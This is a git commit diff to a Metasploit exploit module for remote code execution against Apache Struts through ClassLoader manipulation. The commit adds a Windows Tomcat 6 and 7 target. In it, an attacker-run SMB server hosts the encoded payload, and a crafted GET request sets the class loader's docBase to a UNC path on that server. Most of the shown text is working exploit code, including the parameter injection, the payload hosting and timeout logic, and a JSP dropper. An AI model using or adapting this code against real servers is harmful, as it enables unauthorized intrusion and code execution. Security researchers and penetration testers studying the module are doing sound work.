Add support for tomcat 7 to struts_code_exec_classloader
parent
fef8b89001
commit
e1a4b046a0
|
@ -8,9 +8,10 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking # It's going to manipulate the Class Loader
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::SMB::Server::Share
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -27,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Mark Thomas', # Vulnerability Discovery
|
||||
'Przemyslaw Celej', # Vulnerability Discovery
|
||||
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
|
||||
'Redsadic <julian.vilas[at]gmail.com>', # Metasploit Module
|
||||
'Matthew Hall <hallm[at]sec-1.com>' # SMB target
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -46,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Space' => 5000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Targets' =>
|
||||
[
|
||||
['Java',
|
||||
|
@ -65,6 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
|
||||
{
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Mar 06 2014',
|
||||
|
@ -73,9 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']]),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
||||
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
|
||||
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]),
|
||||
OptString.new('FILE_NAME', [ true, 'The JSP file with the payload (target dependant)', 'HelloWorld.jsp']),
|
||||
OptString.new('FOLDER_NAME', [ true, 'The Folder where the JSP payload lives (target dependant)', 'example'])
|
||||
], self.class)
|
||||
|
||||
deregister_options('FILE_CONTENTS')
|
||||
end
|
||||
|
||||
def jsp_dropper(file, exe)
|
||||
|
@ -199,6 +213,34 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
if target.name =~ /Remote SMB Resource/
|
||||
begin
|
||||
Timeout.timeout(datastore['SMB_DELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# do nothing... just finish exploit and stop smb server...
|
||||
end
|
||||
else
|
||||
class_loader_exploit
|
||||
end
|
||||
end
|
||||
|
||||
# Used with SMB targets
|
||||
def primer
|
||||
self.file_contents = payload.encoded
|
||||
print_status("File available on #{unc}...")
|
||||
|
||||
print_status("#{peer} - Modifying Class Loader...")
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
|
||||
}
|
||||
})
|
||||
end
|
||||
|
||||
def class_loader_exploit
|
||||
prefix_jsp = rand_text_alphanumeric(3+rand(3))
|
||||
date_format = rand_text_numeric(1+rand(4))
|
||||
@jsp_file = prefix_jsp + date_format + ".jsp"
|
||||
|
|
Loading…
Reference in New Issue